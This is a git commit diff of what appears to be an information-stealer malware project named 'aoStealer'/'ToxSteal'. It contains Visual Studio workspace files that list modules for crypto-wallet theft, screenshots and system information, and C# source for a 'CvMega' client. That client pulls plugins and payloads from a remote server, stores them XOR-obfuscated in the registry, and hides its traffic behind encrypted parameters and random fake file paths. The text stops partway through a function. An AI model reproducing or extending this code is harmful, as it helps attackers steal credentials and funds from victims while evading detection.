initial commit
This commit is contained in:
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Binary file not shown.
Executable
BIN
Binary file not shown.
Binary file not shown.
Executable
BIN
Binary file not shown.
@@ -0,0 +1,6 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<configuration>
|
||||
<startup>
|
||||
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.2" />
|
||||
</startup>
|
||||
</configuration>
|
||||
Vendored
BIN
Binary file not shown.
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Binary file not shown.
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,148 @@
|
||||
{
|
||||
"Version": 1,
|
||||
"WorkspaceRootPath": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\",
|
||||
"Documents": [
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\cvmega\\plugin.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:cvmega\\plugin.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
|
||||
},
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets.device\\systeminfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets.device\\systeminfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
|
||||
},
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\aostealerv35_c6.csproj||{04B8AB82-A572-4FEF-95CE-5222444B6B64}|",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:aostealerv35_c6.csproj||{04B8AB82-A572-4FEF-95CE-5222444B6B64}|"
|
||||
},
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.helper.data\\counter.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.helper.data\\counter.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
|
||||
},
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.helper\\windowsinfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.helper\\windowsinfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
|
||||
},
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets\\itarget.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets\\itarget.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
|
||||
},
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets.device\\screenshot.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets.device\\screenshot.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
|
||||
},
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets.crypto\\cryptodesktop.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets.crypto\\cryptodesktop.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
|
||||
}
|
||||
],
|
||||
"DocumentGroupContainers": [
|
||||
{
|
||||
"Orientation": 1,
|
||||
"VerticalTabListWidth": 256,
|
||||
"DocumentGroups": [
|
||||
{
|
||||
"DockedHeight": 200,
|
||||
"SelectedChildIndex": 6,
|
||||
"Children": [
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 4,
|
||||
"Title": "WindowsInfo.cs",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper\\WindowsInfo.cs",
|
||||
"RelativeDocumentMoniker": "Intelix.Helper\\WindowsInfo.cs",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper\\WindowsInfo.cs",
|
||||
"RelativeToolTip": "Intelix.Helper\\WindowsInfo.cs",
|
||||
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
|
||||
"WhenOpened": "2025-11-14T06:24:20.246Z"
|
||||
},
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 5,
|
||||
"Title": "ITarget.cs",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets\\ITarget.cs",
|
||||
"RelativeDocumentMoniker": "Intelix.Targets\\ITarget.cs",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets\\ITarget.cs",
|
||||
"RelativeToolTip": "Intelix.Targets\\ITarget.cs",
|
||||
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
|
||||
"WhenOpened": "2025-11-14T06:23:56.835Z"
|
||||
},
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 6,
|
||||
"Title": "ScreenShot.cs",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\ScreenShot.cs",
|
||||
"RelativeDocumentMoniker": "Intelix.Targets.Device\\ScreenShot.cs",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\ScreenShot.cs",
|
||||
"RelativeToolTip": "Intelix.Targets.Device\\ScreenShot.cs",
|
||||
"ViewState": "AgIAAAAAAAAAAAAAAAAAAGkAAAATAAAAAAAAAA==",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
|
||||
"WhenOpened": "2025-11-14T06:17:48.591Z"
|
||||
},
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 7,
|
||||
"Title": "CryptoDesktop.cs",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Crypto\\CryptoDesktop.cs",
|
||||
"RelativeDocumentMoniker": "Intelix.Targets.Crypto\\CryptoDesktop.cs",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Crypto\\CryptoDesktop.cs",
|
||||
"RelativeToolTip": "Intelix.Targets.Crypto\\CryptoDesktop.cs",
|
||||
"ViewState": "AgIAACYAAAAAAAAAAAAQwAAAAAAAAAAAAAAAAA==",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
|
||||
"WhenOpened": "2025-11-14T06:17:25.353Z"
|
||||
},
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 1,
|
||||
"Title": "SystemInfo.cs",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\SystemInfo.cs",
|
||||
"RelativeDocumentMoniker": "Intelix.Targets.Device\\SystemInfo.cs",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\SystemInfo.cs",
|
||||
"RelativeToolTip": "Intelix.Targets.Device\\SystemInfo.cs",
|
||||
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAkBAAAGAAAAAAAAAA==",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
|
||||
"WhenOpened": "2025-11-14T06:13:39.667Z"
|
||||
},
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 2,
|
||||
"Title": "aoStealerv35_c6",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\aoStealerv35_c6.csproj",
|
||||
"RelativeDocumentMoniker": "aoStealerv35_c6.csproj",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\aoStealerv35_c6.csproj",
|
||||
"RelativeToolTip": "aoStealerv35_c6.csproj",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000758|",
|
||||
"WhenOpened": "2025-11-14T05:57:49.856Z"
|
||||
},
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 0,
|
||||
"Title": "Plugin.cs",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\CvMega\\Plugin.cs",
|
||||
"RelativeDocumentMoniker": "CvMega\\Plugin.cs",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\CvMega\\Plugin.cs",
|
||||
"RelativeToolTip": "CvMega\\Plugin.cs",
|
||||
"ViewState": "AgIAAGAAAAAAAAAAAAAuwHMAAAAlAAAAAAAAAA==",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
|
||||
"WhenOpened": "2025-11-14T05:42:53.155Z",
|
||||
"EditorCaption": ""
|
||||
},
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 3,
|
||||
"Title": "Counter.cs",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper.Data\\Counter.cs",
|
||||
"RelativeDocumentMoniker": "Intelix.Helper.Data\\Counter.cs",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper.Data\\Counter.cs",
|
||||
"RelativeToolTip": "Intelix.Helper.Data\\Counter.cs",
|
||||
"ViewState": "AgIAAB8AAAAAAAAAAAAiwEAAAAAoAAAAAAAAAA==",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
|
||||
"WhenOpened": "2025-11-14T06:25:21.693Z"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -0,0 +1,148 @@
|
||||
{
|
||||
"Version": 1,
|
||||
"WorkspaceRootPath": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\",
|
||||
"Documents": [
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\cvmega\\plugin.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:cvmega\\plugin.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
|
||||
},
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets.device\\systeminfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets.device\\systeminfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
|
||||
},
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\aostealerv35_c6.csproj||{04B8AB82-A572-4FEF-95CE-5222444B6B64}|",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:aostealerv35_c6.csproj||{04B8AB82-A572-4FEF-95CE-5222444B6B64}|"
|
||||
},
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.helper.data\\counter.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.helper.data\\counter.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
|
||||
},
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.helper\\windowsinfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.helper\\windowsinfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
|
||||
},
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets\\itarget.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets\\itarget.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
|
||||
},
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets.device\\screenshot.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets.device\\screenshot.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
|
||||
},
|
||||
{
|
||||
"AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets.crypto\\cryptodesktop.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
|
||||
"RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets.crypto\\cryptodesktop.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
|
||||
}
|
||||
],
|
||||
"DocumentGroupContainers": [
|
||||
{
|
||||
"Orientation": 1,
|
||||
"VerticalTabListWidth": 256,
|
||||
"DocumentGroups": [
|
||||
{
|
||||
"DockedHeight": 200,
|
||||
"SelectedChildIndex": 6,
|
||||
"Children": [
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 4,
|
||||
"Title": "WindowsInfo.cs",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper\\WindowsInfo.cs",
|
||||
"RelativeDocumentMoniker": "Intelix.Helper\\WindowsInfo.cs",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper\\WindowsInfo.cs",
|
||||
"RelativeToolTip": "Intelix.Helper\\WindowsInfo.cs",
|
||||
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
|
||||
"WhenOpened": "2025-11-14T06:24:20.246Z"
|
||||
},
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 5,
|
||||
"Title": "ITarget.cs",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets\\ITarget.cs",
|
||||
"RelativeDocumentMoniker": "Intelix.Targets\\ITarget.cs",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets\\ITarget.cs",
|
||||
"RelativeToolTip": "Intelix.Targets\\ITarget.cs",
|
||||
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
|
||||
"WhenOpened": "2025-11-14T06:23:56.835Z"
|
||||
},
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 6,
|
||||
"Title": "ScreenShot.cs",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\ScreenShot.cs",
|
||||
"RelativeDocumentMoniker": "Intelix.Targets.Device\\ScreenShot.cs",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\ScreenShot.cs",
|
||||
"RelativeToolTip": "Intelix.Targets.Device\\ScreenShot.cs",
|
||||
"ViewState": "AgIAAAAAAAAAAAAAAAAAAGkAAAATAAAAAAAAAA==",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
|
||||
"WhenOpened": "2025-11-14T06:17:48.591Z"
|
||||
},
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 7,
|
||||
"Title": "CryptoDesktop.cs",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Crypto\\CryptoDesktop.cs",
|
||||
"RelativeDocumentMoniker": "Intelix.Targets.Crypto\\CryptoDesktop.cs",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Crypto\\CryptoDesktop.cs",
|
||||
"RelativeToolTip": "Intelix.Targets.Crypto\\CryptoDesktop.cs",
|
||||
"ViewState": "AgIAACYAAAAAAAAAAAAQwAAAAAAAAAAAAAAAAA==",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
|
||||
"WhenOpened": "2025-11-14T06:17:25.353Z"
|
||||
},
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 1,
|
||||
"Title": "SystemInfo.cs",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\SystemInfo.cs",
|
||||
"RelativeDocumentMoniker": "Intelix.Targets.Device\\SystemInfo.cs",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\SystemInfo.cs",
|
||||
"RelativeToolTip": "Intelix.Targets.Device\\SystemInfo.cs",
|
||||
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAkBAAAGAAAAAAAAAA==",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
|
||||
"WhenOpened": "2025-11-14T06:13:39.667Z"
|
||||
},
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 2,
|
||||
"Title": "aoStealerv35_c6",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\aoStealerv35_c6.csproj",
|
||||
"RelativeDocumentMoniker": "aoStealerv35_c6.csproj",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\aoStealerv35_c6.csproj",
|
||||
"RelativeToolTip": "aoStealerv35_c6.csproj",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000758|",
|
||||
"WhenOpened": "2025-11-14T05:57:49.856Z"
|
||||
},
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 0,
|
||||
"Title": "Plugin.cs",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\CvMega\\Plugin.cs",
|
||||
"RelativeDocumentMoniker": "CvMega\\Plugin.cs",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\CvMega\\Plugin.cs",
|
||||
"RelativeToolTip": "CvMega\\Plugin.cs",
|
||||
"ViewState": "AgIAAGAAAAAAAAAAAAAuwHsAAAAtAAAAAAAAAA==",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
|
||||
"WhenOpened": "2025-11-14T05:42:53.155Z",
|
||||
"EditorCaption": ""
|
||||
},
|
||||
{
|
||||
"$type": "Document",
|
||||
"DocumentIndex": 3,
|
||||
"Title": "Counter.cs",
|
||||
"DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper.Data\\Counter.cs",
|
||||
"RelativeDocumentMoniker": "Intelix.Helper.Data\\Counter.cs",
|
||||
"ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper.Data\\Counter.cs",
|
||||
"RelativeToolTip": "Intelix.Helper.Data\\Counter.cs",
|
||||
"ViewState": "AgIAAB8AAAAAAAAAAAAiwEAAAAAoAAAAAAAAAA==",
|
||||
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
|
||||
"WhenOpened": "2025-11-14T06:25:21.693Z"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,92 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Net.Http;
|
||||
using System.Text;
|
||||
|
||||
namespace CvMega.Helper;
|
||||
|
||||
internal class Client
|
||||
{
|
||||
public static string currentHost = string.Empty;
|
||||
|
||||
public static byte[] GetPlugin(string name)
|
||||
{
|
||||
if (name == "Client")
|
||||
{
|
||||
return null;
|
||||
}
|
||||
if (RegeditKey.CheckValue("ao" + name))
|
||||
{
|
||||
return SimpleEncryptor.XorEncryptMyKey(Convert.FromBase64String(RegeditKey.GetValue("ao" + name)), 66);
|
||||
}
|
||||
byte[] array = SendGet(new Dictionary<string, string>
|
||||
{
|
||||
{ "command", "plugin" },
|
||||
{ "name", name }
|
||||
});
|
||||
if (array == null)
|
||||
{
|
||||
return null;
|
||||
}
|
||||
RegeditKey.SetValue("ao" + name, Convert.ToBase64String(SimpleEncryptor.XorEncryptMyKey(array, 66)));
|
||||
return array;
|
||||
}
|
||||
|
||||
public static byte[] GetResource(string name)
|
||||
{
|
||||
if (name == "Client")
|
||||
{
|
||||
return null;
|
||||
}
|
||||
if (RegeditKey.CheckValue("oa" + name))
|
||||
{
|
||||
return SimpleEncryptor.XorEncryptMyKey(Convert.FromBase64String(RegeditKey.GetValue("ao" + name)), 66);
|
||||
}
|
||||
byte[] array = SendGet(new Dictionary<string, string>
|
||||
{
|
||||
{ "command", "resource" },
|
||||
{ "name", name }
|
||||
});
|
||||
if (array == null)
|
||||
{
|
||||
return null;
|
||||
}
|
||||
RegeditKey.SetValue("ao" + name, Convert.ToBase64String(SimpleEncryptor.XorEncryptMyKey(array, 66)));
|
||||
return array;
|
||||
}
|
||||
|
||||
public static string SendGetRequest(Dictionary<string, string> parameters)
|
||||
{
|
||||
byte[] array = SendGet(parameters);
|
||||
if (array == null)
|
||||
{
|
||||
return null;
|
||||
}
|
||||
return SimpleEncryptor.Decrypt(Encoding.UTF8.GetString(array));
|
||||
}
|
||||
|
||||
public static byte[] SendGet(Dictionary<string, string> parameters)
|
||||
{
|
||||
try
|
||||
{
|
||||
using HttpClient httpClient = new HttpClient();
|
||||
StringBuilder stringBuilder = new StringBuilder(currentHost + RandomPathGenerator.GenerateCompletelyRandomPath());
|
||||
if (parameters.Count > 0)
|
||||
{
|
||||
stringBuilder.Append("?");
|
||||
foreach (KeyValuePair<string, string> parameter in parameters)
|
||||
{
|
||||
stringBuilder.Append(SimpleEncryptor.Hash(parameter.Key) + "=" + SimpleEncryptor.Encrypt(parameter.Value) + "&");
|
||||
}
|
||||
stringBuilder.Length--;
|
||||
}
|
||||
string requestUri = stringBuilder.ToString();
|
||||
httpClient.DefaultRequestHeaders.Add("User-Agent", "cvmega");
|
||||
return httpClient.GetAsync(requestUri).Result.Content.ReadAsByteArrayAsync().Result;
|
||||
}
|
||||
catch
|
||||
{
|
||||
return null;
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,16 @@
|
||||
using System.Threading;
|
||||
|
||||
namespace CvMega.Helper;
|
||||
|
||||
public static class MutexControl
|
||||
{
|
||||
public static Mutex currentApp;
|
||||
|
||||
public static bool createdNew;
|
||||
|
||||
public static bool CreateMutex(string mtx)
|
||||
{
|
||||
currentApp = new Mutex(initiallyOwned: false, mtx, out createdNew);
|
||||
return createdNew;
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,40 @@
|
||||
using System;
|
||||
using System.Text;
|
||||
|
||||
namespace CvMega.Helper;
|
||||
|
||||
internal class RandomPathGenerator
|
||||
{
|
||||
private static readonly Random random = new Random();
|
||||
|
||||
private static readonly string chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
|
||||
|
||||
private static readonly string[] extensions = new string[7] { "", ".txt", ".png", ".jpg", ".html", ".json", "" };
|
||||
|
||||
public static string GenerateCompletelyRandomPath()
|
||||
{
|
||||
int num = random.Next(1, 11);
|
||||
StringBuilder stringBuilder = new StringBuilder();
|
||||
for (int i = 0; i < num; i++)
|
||||
{
|
||||
int length = random.Next(3, 20);
|
||||
stringBuilder.Append('/');
|
||||
stringBuilder.Append(GenerateRandomString(length));
|
||||
}
|
||||
if (random.Next(2) == 1)
|
||||
{
|
||||
stringBuilder.Append(extensions[random.Next(extensions.Length)]);
|
||||
}
|
||||
return stringBuilder.ToString();
|
||||
}
|
||||
|
||||
private static string GenerateRandomString(int length)
|
||||
{
|
||||
StringBuilder stringBuilder = new StringBuilder(length);
